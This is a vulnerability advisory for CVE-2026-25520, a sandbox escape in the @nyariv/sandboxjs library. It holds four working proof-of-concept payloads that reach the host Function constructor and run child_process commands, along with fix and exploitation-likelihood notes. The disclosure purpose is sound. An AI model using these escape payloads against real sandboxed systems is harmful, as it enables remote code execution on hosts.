CVE-2026-25520
@nyariv/sandboxjs has a Sandbox Escape issue
Description
### Summary The return values of functions aren't wrapped. `Object.values`/`Object.entries` can be used to get an Array containing the host's `Function` constructor, by using `Array.prototype.at` you can obtain the hosts `Function` constructor, which can be used to execute arbitrary code outside of the sandbox. ### Details The return values of functions aren't wrapped, chaining function calls allows bypassing most validation/sanitization. ### PoC ```js const s = require('@nyariv/sandboxjs').default; const sb = new s(); payload = ` console.log( Object.values(this).at(0)( "return process.getBuiltinModule('child_process').execSync('ls -lah').toString()", )(), ); ` sb.compile(payload)().run(); ``` ```js const s = require("@nyariv/sandboxjs").default; const sb = new s(); payload = ` console.log( Object.entries(this)[0].at(1)( "return process.getBuiltinModule('child_process').execSync('ls -lah').toString()", )(), ); ` sb.compile(payload)().run(); ``` ```js const s = require("@nyariv/sandboxjs").default; const sb = new s(); payload = ` console.log( Object.entries(this) .at(0) .map((f) => { if (typeof f === 'function') { f.call('', 'return process')() .getBuiltinModule('child_process') .execSync('ls -lah', { stdio: 'inherit' }); } }), ); ` sb.compile(payload)().run(); ``` ```js const s = require("@nyariv/sandboxjs").default; const sb = new s(); payload = ` const t = (f) => { f.call('', 'return process')() .getBuiltinModule('child_process') .execSync('ls -lah', { stdio: 'inherit' }); }; console.log(t.call(...Object.entries(this)[0])); ` sb.compile(payload)().run(); ``` ### Impact Sanbox Escape -> RCE
How to fix CVE-2026-25520
To remediate CVE-2026-25520, upgrade the affected package to a fixed version below.
- —upgrade to 0.8.29 or later
Is CVE-2026-25520 being exploited?
Low — EPSS is 0.1%, meaning exploitation activity has not been observed at scale.